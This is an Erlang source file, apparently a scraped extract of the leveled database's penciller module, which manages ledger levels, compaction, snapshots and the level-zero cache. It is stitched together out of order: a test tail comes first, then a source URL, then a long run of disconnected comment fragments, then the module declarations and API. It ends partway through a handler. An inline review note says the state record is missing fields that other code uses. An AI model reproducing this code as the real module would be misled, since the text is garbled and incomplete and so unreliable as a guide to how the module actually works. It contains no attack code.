    clean_testdir(RootPath),
    {ok, PCLr} =
        pcl_start(#penciller_options{root_path=RootPath,
                                        max_inmemory_tablesize=1000,
                                        sst_options=#sst_options{}}),
    %% The snapshot must be taken from within the fake bookie process,
    %% so the snapshot's lifetime is tied to that process (see loop/0)
    FakeBookie = spawn(fun loop/0),
    Mon = erlang:monitor(process, FakeBookie),
    FakeBookie ! {snap, PCLr, self()},
    {ok, PclSnap, null} =
        receive
            {FakeBookie, {ok, Snap, null}} ->
                {ok, Snap, null}
        end,
    %% Fold fun: returns true once PclSnap is observed dead; while it
    %% is alive, sleep 100ms and report false so the fold keeps polling
    CheckSnapDiesFun =
        fun(_X, IsDead) ->
            case IsDead of
                true ->
                    true;
                false ->
                    case erlang:process_info(PclSnap) of
                        undefined ->
                            true;
                        _ ->
                            timer:sleep(100),
                            false
                    end
            end
        end,
    %% Bookie still alive -> the snapshot must not have died
    ?assertNot(lists:foldl(CheckSnapDiesFun, false, [1, 2])),
    FakeBookie ! stop,
    receive
        {'DOWN', Mon, process, FakeBookie, normal} ->
            %% Now we know that pclr should have received this too!
            %% (better than timer:sleep/1)
            ok
    end,
    %% Bookie dead -> the snapshot should die within the polling window
    ?assert(lists:foldl(CheckSnapDiesFun, false, lists:seq(1, 10))),
    pcl_close(PCLr),
    clean_testdir(RootPath).
%% the fake bookie. Some calls to leveled_bookie (like the two below)
%% do not go via the gen_server (but it looks like they expect to be
%% called by the gen_server, internally!) they use "self()" to
%% populate the bookie's pid in the pclr. This process wrapping the
%% calls ensures that the TEST controls the bookie's Pid. The
%% FakeBookie.
%% Minimal stand-in for a bookie process: on a {snap, ...} request it
%% takes a snapshot of the given penciller from within this process
%% (so self() becomes the bookie pid recorded against the snapshot)
%% and replies with the result; exits normally on 'stop'.
loop() ->
    receive
        {snap, PCLr, TestPid} ->
            {ok, Snap, null} =
                leveled_bookie:snapshot_store(
                    leveled_bookie:empty_ledgercache(),
                    PCLr,
                    null,
                    {no_monitor, 0},
                    ledger,
                    undefined,
                    false),
            TestPid ! {self(), {ok, Snap, null}},
            loop();
        stop ->
            ok
    end.
-endif.
| null | https://raw.githubusercontent.com/martinsumner/leveled/e06d2a538fac9669145f1d226ff049d1ab1f9294/src/leveled_penciller.erl | erlang | -------- PENCILLER ---------
The penciller is responsible for writing and re-writing the ledger - a
persisted, ordered view of non-recent Keys and Metadata which have been
added to the store.
- The penciller maintains a manifest of all the files within the current
Ledger.
requested snapshots of the Ledger
- The accepts new dumps (in the form of a leveled_tree accomponied by
memory, or 'returned' if the bookie must continue without refreshing as the
backlog of compaction work)
may lose data but only in sequence from a particular sequence number. On
the journal.
The Ledger is divided into many levels
maximum size - so we don't have to consider problems of either having more
remainder with overlapping in sequence numbers in memory after the file is
to the lower level must be the highest priority, as otherwise writes to the
ledger will stall, when there is next a need to persist.
files. Compaction work should be sheduled if the number of files exceeds
the key is found. To check a level the correct file must be sought from the
manifest for that level, and then a call is made to that file. If the Key
is not present then every level should be checked.
If a compaction change takes the size of a level beyond the target size,
then compaction work for that level + 1 should be added to the compaction
work queue.
- it has timed out due to a period of inactivity
- it has been triggered by the a cast to indicate the arrival of high
priority compaction work
whenever it has either completed work, or a timeout has occurred since it
was informed there was no work to do.
When the clerk picks work it will take the current manifest, and the
When the clerk has completed the work it can request that the manifest
---------- PUSH ----------
call to PUSH should be immediately acknowledged, and then work should be
The Penciller MUST NOT accept a new PUSH if the Clerk has commenced the
continue to grow the cache before trying again.
---------- FETCH ----------
L0 tree, then look in the SST files Level by Level (including level 0),
consulting the Manifest to determine which file should be checked at each
level.
Iterators may request a snapshot of the database. A snapshot is a cloned
completed or has timed out.
---------- ON STARTUP ----------
management process for each file in the manifest.
The penciller should then try and read any Level 0 file which has the
before the startup of the overall store can be completed.
---------- FOLDER STRUCTURE ----------
$ROOT/ledger/ledger_manifest/ - used for keeping manifest files
In larger stores there could be a large number of files in the ledger_file
folder - perhaps o(1000). It is assumed that modern file systems should
handle this efficiently.
work. When the Clerk has requested and taken work, it should perform the
and then write a new manifest file that represents that state with using
the next Manifest sequence number as the filename:
- nonzero_<ManifestSQN#>.pnd
The Penciller on accepting the change should rename the manifest file to -
- nonzero_<ManifestSQN#>.crr
highest such manifest sequence number. This will be started as the
manifest, together with any _0_0.sst file found at that Manifest SQN.
file does not advanced the Manifest SQN.
The pace at which the store can accept updates will be dependent on the
the time it takes to merge from Level 0. As if a clerk has commenced
allowed to again reach capacity
has reached capacity. This places the penciller in a levelzero_pending
been completed it will confirm completion to the penciller which can then
revert the levelzero_pending state, add the file to the manifest and clear
Slimmed down version of the manifest containing part
used to extract this part
i.e. compaction work
i.e. compaction work
============================================================================
API
============================================================================
@doc
Start a penciller using a penciller options record. The start_snapshot
option should be used if this is to be a clone of an existing penciller,
otherwise the penciller will look in root path for a manifest and
When starting a clone a query can also be passed. This prevents the whole
Level Zero memory space from being copied to the snapshot, instead the
copied into the clone.
@doc
Don't link to the bookie - this is a snpashot
@doc
The load is made up of a cache in the form of a leveled_skiplist tuple (or
the atom empty_cache if no cache is present), an index of entries in the
skiplist in the form of leveled_pmem index (or empty_index), the minimum
sequence number in the cache and the maximum sequence number.
If the penciller does not have capacity for the pushed cache it will
respond with the atom 'returned'. This is a signal to hold the memory
is a backlog of merges - so the bookie should backoff for longer each time.
@doc
30-40ms. This allows that process to fetch this slot by slot, so that
this is split into a series of smaller events.
The return value will be a leveled_skiplist that forms that part of the
cache
as it is deadlocked making this call.
@doc
with the value.
The Key needs to be hashable (i.e. have a tag which indicates that the key
can be looked up) - index entries are not hashable for example.
If the hash is already known, call pcl_fetch/3 as segment_hash is a
relatively expensive hash function
@doc
with the value.
Hash should be result of leveled_codec:segment_hash(Key)
@doc
all keys in the range - so must only be run against snapshots of the
penciller to avoid blocking behaviour.
leveled_codec:endkey_passed/2 - so use nulls within the tuple to manage
@doc
all keys in the range - so must only be run against snapshots of the
penciller to avoid blocking behaviour.
are interesting to the fetch
Note that segment must be false unless the object Tag supports additional
indexing by segment. This cannot be used on ?IDX_TAG and other tags that
The passed in accumulator should have the Max Key Count
@doc
@doc
Check if the sequence number of the passed key is not replaced by a change
after the passed sequence number. Will return:
- current
- replaced
- missing
@doc
A request from the clerk to check for work. If work is present the
request.
@doc
Provide a manifest record (i.e. the output of the leveled_pmanifest module)
that is required to beocme the new manifest.
@doc
is now complete, so the filename and key ranges can be added to the
cache.
@doc
Poll from a delete_pending file requesting a message if the file is now
ready for deletion (i.e. all snapshots which depend on the file have
finished)
@doc
At startup the penciller will get the largest sequence number that is
within the persisted files. This function allows for this sequence number
to be fetched - so that it can be used to determine parts of the Ledger
which may have been lost in the last shutdown (so that the ledger can
@doc
Register a snapshot of the penciller, returning a state record from the
@doc
Inform the primary penciller that a snapshot is finished, so that the
penciller can allow deletes to proceed if appropriate.
@doc
Ledger
@doc
Close the penciller neatly, trying to persist to disk anything in the memory
@doc
Close the penciller neatly, trying to persist to disk anything in the memory
the calling process which to erase the store).
@doc
Function specifically added to help testing. In particular to make sure
that blooms are still available after pencllers have been re-loaded from
disk.
@doc
Used in test only to confim compaction work complete before closing
@doc
@doc
Add to the list of forced logs, a list of more forced logs
@doc
Remove from the list of forced logs, a list of forced logs
============================================================================
gen_server callbacks
============================================================================
monitor the bookie, and close the snapshot when bookie
exits
The push_mem process is as follows:
written, or there is a work backlog - the cache is returned with the
expectation that PUTs should be slowed. Also if the cache has reached
penciller's cache.
Cannot update the cache, or roll the memory so reply `returned`
updated cache at a later time
Rename any reference to loop state that may be used by the function
to be returned -
Register and load a snapshot
For setup of the snapshot to be efficient should pass a query
memory being required to be trasnferred to the clone. However, this
will not be a valid clone for fetch
file present it is safe to write the current contents of memory. If
recoverable from the ledger, and there should not be a lot to recover
as presumably the ETS file has been recently flushed, hence the presence
The penciller should close each file in the manifest, and call a close
on the clerk.
This is accepted as the new manifest, files may be deleted
Need to preserve the penciller's view of snapshots stored in
the manifest
checked against the manifest to prompt the deletion, however it must also
be removed from the manifest's list of pending deletes. This is only
possible when the manifest is in control of the penciller not the clerk.
When work is ongoing (i.e. the manifest is under control of the clerk),
any removals from the manifest need to be stored temporarily (in
pending_removals) until such time that the manifest is in control of the
penciller and can be updated.
The maybe_release boolean on state is used if any file is not ready to
delete, and there is work ongoing. This will then trigger a check to
ensure any timed out snapshots are released, in case this is the factor
blocking the delete confirmation
When an updated manifest is submitted by the clerk, the pending_removals
will be cleared from pending using the maybe_release boolean
Work is blocked by ongoing activity
priority
No impediment to work - see what other work may be required
See if the in-memory cache requires rolling now
Check for a backlog of work
No work required
Must not do this if there is a work backlog beyond the
tolerance, as then the backlog may never be addressed.
Address the backlog of work, either because there is no
L0 work to do, or because the backlog has grown beyond
tolerance
handle the bookie stopping and stop this snapshot
============================================================================
Path functions
============================================================================
============================================================================
============================================================================
@doc
Normal start of a penciller (i.e. not a snapshot), needs to read the
filesystem and reconstruct the ledger from the files that it finds
vnode syncronisation issues (e.g. stop them all by default merging to
Open manifest
@doc
@doc
Double-check a processis active before attempting to terminate
@doc
ledger at startup. They may have not deeleted as expected, so this saves
them off as non-SST fies to make it easier for an admin to garbage collect
theses files
@doc
Is the cache too big - should it be flushed to on-disk Level 0
There exists some jitter to prevent all caches from flushing concurrently
@doc
will return a bloom representing the contents of the file.
cache one at a time.
The Wait is set to false to use a cast when calling this in normal operation
where as the Wait of true is used at shutdown
@doc
Fetch the result from the penciller, starting by looking in the memory,
This allows for the request to be timed, and the timing result to be added
to the aggregate timings - so that timinings per level can be logged and
the cost of requests dropping levels can be monitored.
the result tuple includes the level at which the result was found.
@doc
Fetch the result from the penciller, starting by looking in the memory,
@doc
turn until a match is found.
Levels can be skipped by checking the bloom for the relevant file at that
level.
@doc
object (used to allow the journal to check compaction status from a cache
of the ledger - objects with a more recent sequence number can be compacted).
value. We return true here as we wouldn't want to
compact thta more advanced value, but this may cause
confusion in snapshots.
============================================================================
Iterator functions
TODO - move to dedicated module with extended unit testing
============================================================================
@doc
The keyfolder will compare an iterator across the immutable in-memory cache
of the Penciller (the IMMiter), with an iterator across the persisted part
(the SSTiter).
intended to be infinite.
accumulator. The iterators are advanced if they either win (i.e. are the
next key), or are dominated. This goes on until the iterators are empty.
To advance the SSTiter the find_nextkey/4 function is used, as the SSTiter
is an iterator across multiple levels - and so needs to do its own
comparisons to pop the next result.
This query had a max count, so we must respond with the
remainder on the count
There are no more keys in-range in the in-memory
iterator, so take action as if this iterator is empty
(see above)
No more keys in range in the persisted store, so use the
There is a next key, so need to know which is the
with different sequence numbers).
so that there is no need to iterate to it again
key was the most dominant across all SST levels,
@doc
Make an accumulation decision based one the date range
@doc
Looks to find the best choice for the next key across the levels (other
than in-memory table)
In finding the best choice, the next key in a given level may be a next
block or next file pointer which will need to be expanded
The array has been scanned without finding a best key - must be
exhausted - respond to indicate no more keys to be found by the
iterator
All levels have been scanned, so need to remove the best result from
combination
Get the next key at this level
Compare the next key at this level with the best key
There is no key at this level - go to the next level
the file to expand this level out before proceeding
examined a real key at this level
query the file to expand this level out before proceeding
examined a real key at this level
No best key set - so can assume that this key is the best key,
and check the lower levels
There is a real key and a best key to compare, and the real key
at this level is before the best key, and so is now the new best
key
This is a dominated key, so we need to skip over it
There is a real key at the front of this level and it has
the best key
But we also need to remove the dominated key from the
lower level in the query array
This is not the best key
============================================================================
Test
============================================================================
old test data doesn't have the magic hash
Add some more keys and confirm that check sequence number still
sees the old version in the previous snapshot, but will see the new
version in a new snapshot
Now we know that pclr should have received this too!
(better than timer:sleep/1)
do not go via the gen_server (but it looks like they expect to be
called by the gen_server, internally!) they use "self()" to
populate the bookie's pid in the pclr. This process wrapping the | - The Penciller provides re - write ( compaction ) work up to be managed by
the Penciller 's Clerk
- The Penciller can be cloned and maintains a register of clones who have
an array of hash - listing binaries ) from the Bookie , and responds either ' ok '
to the bookie if the information is accepted and the Bookie can refresh its
Penciller is not currently able to accept the update ( potentially due to a
- The Penciller 's persistence of the ledger may not be reliable , in that it
startup the Penciller will inform the Bookie of the highest sequence number
it has , and the Bookie should load any missing data from that point out of
-------- LEDGER ---------
- L0 : New keys are received from the Bookie and and kept in the levelzero
cache , until that cache is the size of a SST file , and it is then persisted
as a SST file at this level . L0 SST files can be larger than the normal
than one L0 file ( and handling what happens on a crash between writing the
files when the second may have overlapping sequence numbers ) , or having a
written . Once the persistence is completed , the L0 cache can be erased .
There can be only one SST file at Level 0 , so the work to merge that file
- L1 TO L7 : May contain multiple processes managing non - overlapping SST
the target size of the level , where the target size is 8 ^ n.
The most recent revision of a Key can be found by checking each level until
Compaction work is fetched by the Penciller 's Clerk because :
The Penciller 's Clerk ( which performs compaction worker ) will always call
the Penciller to find out the highest priority work currently required
Penciller assumes the manifest sequence number is to be incremented .
change be committed by the Penciller . The commit is made through changing
the filename of the new manifest - so the Penciller is not held up by the
process of writing a file, just altering file system metadata.
The Penciller must support the PUSH of a dump of keys from the Bookie . The
completed to merge the cache update into the L0 cache .
conversion of the current L0 cache into a SST file , but not completed this
change . The Penciller in this case returns the push , and the Bookie should
On request to fetch a key the Penciller should look first in the in - memory
---------- SNAPSHOT ----------
Penciller seeded not from disk , but by the in - memory and the
in - memory manifest , allowing for direct reference for the SST file processes .
Clones formed to support snapshots are registered by the Penciller , so that
SST files valid at the point of the snapshot until either the iterator is
On Startup the Bookie with ask the Penciller to initiate the Ledger first .
To initiate the Ledger the must consult the manifest , and then start a SST
manifest sequence number one higher than the last store in the manifest .
The Bookie will ask the Inker for any Keys seen beyond that sequence number
---------- ON SHUTDOWN ----------
On a controlled shutdown the Penciller should attempt to write any in - memory
ETS table to a L0 SST file, assuming one is not already pending. If one is
already pending then the Penciller will not persist this part of the Ledger .
The following folders are used by the Penciller
$ ROOT / ledger / ledger_files/ - containing individual SST files
---------- COMPACTION & MANIFEST UPDATES ----------
The Penciller can have one and only one Clerk for performing compaction
5 compaction work starting the new SST process to manage the new Ledger state
On startup , the Penciller should look for the file with the
Level zero files are not kept in the persisted manifest , and adding a L0
speed at which the Penciller 's Clerk can merge files at lower levels plus
compaction work at a lower level and then immediately a L0 SST file is
written the Penciller will need to wait for this compaction work to
complete and the L0 file to be compacted before the ETS table can be
The writing of L0 files do not require the involvement of the clerk .
The L0 files are prompted directly by the penciller when the in - memory tree
state , and in this state it must return new pushes . Once the SST file has
the current level zero in - memory view .
-module(leveled_penciller).
-behaviour(gen_server).
-include("include/leveled.hrl").
-export([
init/1,
handle_call/3,
handle_cast/2,
handle_info/2,
terminate/2,
code_change/3,
format_status/2]).
-export([
pcl_snapstart/1,
pcl_start/1,
pcl_pushmem/2,
pcl_fetchlevelzero/3,
pcl_fetch/4,
pcl_fetchkeys/5,
pcl_fetchkeys/6,
pcl_fetchkeysbysegment/8,
pcl_fetchnextkey/5,
pcl_checksequencenumber/3,
pcl_workforclerk/1,
pcl_manifestchange/2,
pcl_confirml0complete/5,
pcl_confirmdelete/3,
pcl_close/1,
pcl_doom/1,
pcl_releasesnapshot/2,
pcl_registersnapshot/5,
pcl_getstartupsequencenumber/1,
pcl_checkbloomtest/2,
pcl_checkforwork/1,
pcl_persistedsqn/1,
pcl_loglevel/2,
pcl_addlogs/2,
pcl_removelogs/2]).
-export([
sst_rootpath/1,
sst_filename/3]).
-export([
clean_testdir/1]).
-include_lib("eunit/include/eunit.hrl").
-define(MAX_WORK_WAIT, 300).
-define(MANIFEST_FP, "ledger_manifest").
-define(FILES_FP, "ledger_files").
-define(CURRENT_FILEX, "crr").
-define(PENDING_FILEX, "pnd").
-define(SST_FILEX, ".sst").
-define(ARCHIVE_FILEX, ".bak").
-define(SUPER_MAX_TABLE_SIZE, 40000).
-define(PROMPT_WAIT_ONL0, 5).
-define(WORKQUEUE_BACKLOG_TOLERANCE, 4).
-define(COIN_SIDECOUNT, 4).
Log a very slow fetch - longer than 500ms
-define(ITERATOR_SCANWIDTH, 4).
-define(TIMING_SAMPLECOUNTDOWN, 10000).
-define(TIMING_SAMPLESIZE, 100).
-define(OPEN_LASTMOD_RANGE, {0, infinity}).
%% Penciller loop state.
-record(state, {manifest ::
                    leveled_pmanifest:manifest() | undefined | redacted,
                query_manifest ::
                    {list(),
                        leveled_codec:ledger_key(),
                        leveled_codec:ledger_key()} | undefined,
                %% Reduced snapshot manifest of only the SST files related to
                %% a specific query, and the StartKey/EndKey of that query
                %% NOTE(review): field lines for the highest SQN persisted
                %% (persisted_sqn), the highest SQN added to L0 (ledger_sqn),
                %% and work_backlog/work_ongoing are referenced elsewhere in
                %% this module but are missing from this extract - confirm
                %% against the upstream source before relying on this record
                levelzero_pending = false :: boolean(),
                levelzero_constructor :: pid() | undefined,
                levelzero_cache = [] :: levelzero_cache() | redacted,
                levelzero_size = 0 :: integer(),
                levelzero_maxcachesize :: integer() | undefined,
                levelzero_cointoss = false :: boolean(),
                levelzero_index ::
                    leveled_pmem:index_array() | undefined | redacted,
                levelzero_astree :: list() | undefined | redacted,
                root_path = "test" :: string(),
                clerk :: pid() | undefined,
                is_snapshot = false :: boolean(),
                snapshot_fully_loaded = false :: boolean(),
                snapshot_time :: pos_integer() | undefined,
                source_penciller :: pid() | undefined,
                bookie_monref :: reference() | undefined,
                pending_removals = [] :: list(string()),
                maybe_release = false :: boolean(),
                snaptimeout_short :: pos_integer()|undefined,
                snaptimeout_long :: pos_integer()|undefined,
                monitor = {no_monitor, 0} :: leveled_monitor:monitor(),
                sst_options = #sst_options{} :: sst_options()}).
-type penciller_options() :: #penciller_options{}.
-type bookies_memory() :: {tuple()|empty_cache,
array:array()|empty_array,
integer()|infinity,
integer()}.
-type pcl_state() :: #state{}.
-type levelzero_cacheentry() :: {pos_integer(), leveled_tree:leveled_tree()}.
-type levelzero_cache() :: list(levelzero_cacheentry()).
-type iterator_entry()
:: {pos_integer(),
list(leveled_codec:ledger_kv()|leveled_sst:expandable_pointer())}.
-type iterator() :: list(iterator_entry()).
-type bad_ledgerkey() :: list().
-type sqn_check() :: current|replaced|missing.
-type sst_fetchfun() ::
fun((pid(),
leveled_codec:ledger_key(),
leveled_codec:segment_hash(),
non_neg_integer()) ->
leveled_codec:ledger_kv()|not_present).
-type levelzero_returnfun() :: fun((levelzero_cacheentry()) -> ok).
-type pclacc_fun() ::
fun((leveled_codec:ledger_key(),
leveled_codec:ledger_value(),
any()) -> any()).
-type sst_options() :: #sst_options{}.
-export_type([levelzero_cacheentry/0, levelzero_returnfun/0, sqn_check/0]).
-spec pcl_start(penciller_options()) -> {ok, pid()}.
%% @doc
%% Start a linked penciller, recovering the manifest and opening the
%% associated sst files to start-up from a previous persisted state.
pcl_start(PCLopts) ->
    gen_server:start_link(?MODULE, [leveled_log:get_opts(), PCLopts], []).

-spec pcl_snapstart(penciller_options()) -> {ok, pid()}.
%% @doc
%% Start an un-linked penciller process, to be used as a snapshot (clone) of
%% another penciller.
pcl_snapstart(PCLopts) ->
    gen_server:start(?MODULE, [leveled_log:get_opts(), PCLopts], []).
-spec pcl_pushmem(pid(), bookies_memory()) -> ok|returned.
%% @doc
%% Load the contents of the Bookie's memory of recent additions to the Ledger
%% to the Ledger proper.
%% Replies ok if the push is accepted, or returned if not - in which case the
%% Bookie should retain its ledger cache and try again soon.
pcl_pushmem(Pid, LedgerCache) ->
    %% Bookie to dump memory onto penciller
    gen_server:call(Pid, {push_mem, LedgerCache}, infinity).
-spec pcl_fetchlevelzero(pid(),
                            non_neg_integer(),
                            fun((levelzero_cacheentry()) -> ok))
                        -> ok.
%% @doc
%% Allows a single slot of the penciller's levelzero cache to be fetched.  The
%% levelzero cache can be up to 40K keys - sending this to the process that is
%% persisting this in a SST file in a single cast would lock the process for
%% too long, so the writer fetches the cache a slot at a time via ReturnFun.
pcl_fetchlevelzero(Pid, Slot, ReturnFun) ->
    %% Timeout to cause crash of L0 file when it can't get the close signal.
    %% If the timeout gets hit outside of close scenario the Penciller will
    %% be stuck in L0 pending
    gen_server:cast(Pid, {fetch_levelzero, Slot, ReturnFun}).
-spec pcl_fetch(pid(), leveled_codec:ledger_key())
                                    -> leveled_codec:ledger_kv()|not_present.
%% @doc
%% Fetch a key, returning the first (highest SQN) occurrence of that Key along
%% with its value.
%% The if expression has no no_lookup branch by design - a key which does not
%% hash to a lookup hash will crash with if_clause.
pcl_fetch(Pid, Key) ->
    Hash = leveled_codec:segment_hash(Key),
    if
        Hash /= no_lookup ->
            gen_server:call(Pid, {fetch, Key, Hash, true}, infinity)
    end.

-spec pcl_fetch(pid(),
                leveled_codec:ledger_key(),
                leveled_codec:segment_hash(),
                boolean()) -> leveled_codec:ledger_kv()|not_present.
%% @doc
%% Fetch a key, returning the first (highest SQN) occurrence of that Key along
%% with its value - with the segment hash pre-computed by the caller, and a
%% boolean to control whether the levelzero index is consulted.
pcl_fetch(Pid, Key, Hash, UseL0Index) ->
    gen_server:call(Pid, {fetch, Key, Hash, UseL0Index}, infinity).
-spec pcl_fetchkeys(pid(),
                    leveled_codec:ledger_key(),
                    leveled_codec:ledger_key(),
                    pclacc_fun(), any(), as_pcl|by_runner) -> any().
%% @doc
%% Run a range query between StartKey and EndKey (inclusive), folding AccFun
%% over each key in the range starting from InitAcc.  Only answered by
%% snapshots whose in-memory view is fully loaded (see fetch_keys clause of
%% handle_call/3).
%% Comparison with the upper-end of the range (EndKey) is done using a
%% dedicated end-key check - so use nulls within the key tuple to manage
%% the top of the range.  Comparison with the start of the range is based on
%% Erlang term order.
pcl_fetchkeys(Pid, StartKey, EndKey, AccFun, InitAcc) ->
    pcl_fetchkeys(Pid, StartKey, EndKey, AccFun, InitAcc, as_pcl).

pcl_fetchkeys(Pid, StartKey, EndKey, AccFun, InitAcc, By) ->
    gen_server:call(Pid,
                    {fetch_keys,
                        StartKey, EndKey,
                        AccFun, InitAcc,
                        false, false, -1,
                        By},
                    infinity).
-spec pcl_fetchkeysbysegment(pid(),
                                leveled_codec:ledger_key(),
                                leveled_codec:ledger_key(),
                                pclacc_fun(), any(),
                                leveled_codec:segment_list(),
                                false | leveled_codec:lastmod_range(),
                                boolean()) -> any().
%% @doc
%% Run a range query between StartKey and EndKey (inclusive), as with
%% pcl_fetchkeys/6, but with an additional input of a SegmentList.  This is a
%% list of 16-bit integers representing the segment IDs band ((2 ^ 16) - 1)
%% that are of interest.  SegmentList must be false if the object has no
%% segment hash, i.e. it uses the no_lookup hash.
%% A last-modified range and a count-limit flag may also be passed.
pcl_fetchkeysbysegment(Pid, StartKey, EndKey, AccFun, InitAcc,
                                SegmentList, LastModRange, LimitByCount) ->
    {MaxKeys, InitAcc0} =
        case LimitByCount of
            true ->
                %% When limiting by count, InitAcc is already the max count
                %% as the first element of a tuple with the actual accumulator
                InitAcc;
            false ->
                {-1, InitAcc}
        end,
    gen_server:call(Pid,
                    {fetch_keys,
                        StartKey, EndKey, AccFun, InitAcc0,
                        SegmentList, LastModRange, MaxKeys,
                        by_runner},
                    infinity).
-spec pcl_fetchnextkey(pid(),
                        leveled_codec:ledger_key(),
                        leveled_codec:ledger_key(),
                        pclacc_fun(), any()) -> any().
%% @doc
%% Run a range query between StartKey and EndKey (inclusive).  This has the
%% same constraints as pcl_fetchkeys/5, but will only return the first key
%% found in erlang term order (MaxKeys is fixed at 1).
pcl_fetchnextkey(Pid, StartKey, EndKey, AccFun, InitAcc) ->
    gen_server:call(Pid,
                    {fetch_keys,
                        StartKey, EndKey,
                        AccFun, InitAcc,
                        false, false, 1,
                        as_pcl},
                    infinity).
-spec pcl_checksequencenumber(pid(),
                                leveled_codec:ledger_key()|bad_ledgerkey(),
                                integer()) -> sqn_check().
%% @doc
%% Check if the given SQN is the current sequence number for the Key in the
%% ledger - answering current, replaced or missing (see sqn_check()).
%% As with pcl_fetch/2, a key without a lookup hash crashes with if_clause
%% by design.
pcl_checksequencenumber(Pid, Key, SQN) ->
    Hash = leveled_codec:segment_hash(Key),
    if
        Hash /= no_lookup ->
            gen_server:call(Pid, {check_sqn, Key, Hash, SQN}, infinity)
    end.
-spec pcl_workforclerk(pid()) -> ok.
%% @doc
%% A request from the clerk to check for work.  The Penciller will cast back
%% to the clerk if there is work - no response is sent to this request.
pcl_workforclerk(Pid) ->
    gen_server:cast(Pid, work_for_clerk).

-spec pcl_manifestchange(pid(), leveled_pmanifest:manifest()) -> ok.
%% @doc
%% Provide a new manifest (the output of merge work) to replace the current
%% manifest.
pcl_manifestchange(Pid, Manifest) ->
    gen_server:cast(Pid, {manifest_change, Manifest}).

-spec pcl_confirml0complete(pid(),
                            string(),
                            leveled_codec:ledger_key(),
                            leveled_codec:ledger_key(),
                            binary()) -> ok.
%% @doc
%% Allows a SST writer that has written a L0 file to confirm that the file is
%% complete, so that it can be added to the manifest and used in place of the
%% in-memory levelzero cache.
pcl_confirml0complete(Pid, FN, StartKey, EndKey, Bloom) ->
    gen_server:cast(Pid, {levelzero_complete, FN, StartKey, EndKey, Bloom}).

-spec pcl_confirmdelete(pid(), string(), pid()) -> ok.
%% @doc
%% A delete-pending file asks the Penciller to confirm that it may now be
%% deleted.
pcl_confirmdelete(Pid, FileName, FilePid) ->
    gen_server:cast(Pid, {confirm_delete, FileName, FilePid}).

-spec pcl_getstartupsequencenumber(pid()) -> integer().
%% @doc
%% Return the SQN up to which the ledger is persisted (any later keys must
%% be reloaded from that point in the Journal).
pcl_getstartupsequencenumber(Pid) ->
    gen_server:call(Pid, get_startup_sqn, infinity).

-spec pcl_registersnapshot(pid(),
                            pid(),
                            no_lookup|{tuple(), tuple()}|undefined,
                            bookies_memory(),
                            boolean())
                                -> {ok, pcl_state()}.
%% @doc
%% Register a snapshot of the penciller, returning a state record from the
%% penciller for the snapshot to use as its LoopData.
pcl_registersnapshot(Pid, Snapshot, Query, BookiesMem, LR) ->
    gen_server:call(Pid,
                    {register_snapshot, Snapshot, Query, BookiesMem, LR},
                    infinity).

-spec pcl_releasesnapshot(pid(), pid()) -> ok.
%% @doc
%% Inform the source penciller that the snapshot is no longer in use, so any
%% file references held on its behalf can be cleared.
pcl_releasesnapshot(Pid, Snapshot) ->
    gen_server:cast(Pid, {release_snapshot, Snapshot}).

-spec pcl_persistedsqn(pid()) -> integer().
%% @doc
%% Return the persisted SQN, the highest SQN which has been persisted into the
%% Ledger.
pcl_persistedsqn(Pid) ->
    gen_server:call(Pid, persisted_sqn, infinity).

-spec pcl_close(pid()) -> ok.
%% @doc
%% Close the penciller neatly (attempting to persist the levelzero cache
%% first - see the close clause of handle_call/3).
pcl_close(Pid) ->
    gen_server:call(Pid, close, 60000).

-spec pcl_doom(pid()) -> {ok, list()}.
%% @doc
%% Close the penciller, and return the list of paths where files exist for
%% this penciller (should the caller wish to erase the store).
pcl_doom(Pid) ->
    gen_server:call(Pid, doom, 60000).

-spec pcl_checkbloomtest(pid(), tuple()) -> boolean().
%% @doc
%% Check the blooms of all levels for the Key's hash - as with pcl_fetch/2,
%% a key without a lookup hash crashes with if_clause by design.
pcl_checkbloomtest(Pid, Key) ->
    Hash = leveled_codec:segment_hash(Key),
    if
        Hash /= no_lookup ->
            gen_server:call(Pid, {checkbloom_fortest, Key, Hash}, 2000)
    end.

-spec pcl_checkforwork(pid()) -> boolean().
%% @doc
%% Ask the penciller whether any compaction work is currently outstanding.
pcl_checkforwork(Pid) ->
    gen_server:call(Pid, check_for_work, 2000).

-spec pcl_loglevel(pid(), leveled_log:log_level()) -> ok.
%% @doc
%% Change the log level of the penciller (propagated to its clerk, and to
%% sst_options for subsequently opened files).
pcl_loglevel(Pid, LogLevel) ->
    gen_server:cast(Pid, {log_level, LogLevel}).

-spec pcl_addlogs(pid(), list(string())) -> ok.
%% @doc
%% Add a set of log references to be logged irrespective of log level.
pcl_addlogs(Pid, ForcedLogs) ->
    gen_server:cast(Pid, {add_logs, ForcedLogs}).

-spec pcl_removelogs(pid(), list(string())) -> ok.
%% @doc
%% Remove a set of forced log references.
pcl_removelogs(Pid, ForcedLogs) ->
    gen_server:cast(Pid, {remove_logs, ForcedLogs}).
%%%============================================================================
%%% gen_server callbacks
%%%============================================================================

%% Start either as a snapshot (no root_path, start_snapshot true) seeded from
%% a source penciller, or as a normal penciller recovered from file.
init([LogOpts, PCLopts]) ->
    leveled_log:save(LogOpts),
    leveled_rand:seed(),
    case {PCLopts#penciller_options.root_path,
            PCLopts#penciller_options.start_snapshot,
            PCLopts#penciller_options.snapshot_query,
            PCLopts#penciller_options.bookies_mem} of
        {undefined, _Snapshot=true, Query, BookiesMem} ->
            SrcPenciller = PCLopts#penciller_options.source_penciller,
            LongRunning = PCLopts#penciller_options.snapshot_longrunning,
            %% Monitor the bookie that requested the snapshot, so that the
            %% snapshot is released if that bookie goes down (see handle_info)
            BookieMonitor =
                erlang:monitor(process, PCLopts#penciller_options.bookies_pid),
            {ok, State} = pcl_registersnapshot(SrcPenciller,
                                                self(),
                                                Query,
                                                BookiesMem,
                                                LongRunning),
            leveled_log:log(p0001, [self()]),
            {ok, State#state{is_snapshot = true,
                                bookie_monref = BookieMonitor,
                                source_penciller = SrcPenciller}};
        {_RootPath, _Snapshot=false, _Q, _BM} ->
            start_from_file(PCLopts)
    end.
handle_call({push_mem, {LedgerTable, PushedIdx, MinSQN, MaxSQN}},
            _From,
            State=#state{is_snapshot=Snap}) when Snap == false ->
    %% The push_mem process is as follows:
    %%
    %% 1. If either the penciller is still waiting on the last L0 file to be
    %% written, or there is a work backlog, or the cache has already reached
    %% the maximum number of lines (by default after 31 pushes from the
    %% bookie) - the push is returned, and the Bookie must retry later.
    %%
    %% 2. If (1) does not apply, the bookie's cache will be added to the
    %% levelzero cache.
    SW = os:timestamp(),
    L0Pending = State#state.levelzero_pending,
    WorkBacklog = State#state.work_backlog,
    CacheAlreadyFull = leveled_pmem:cache_full(State#state.levelzero_cache),
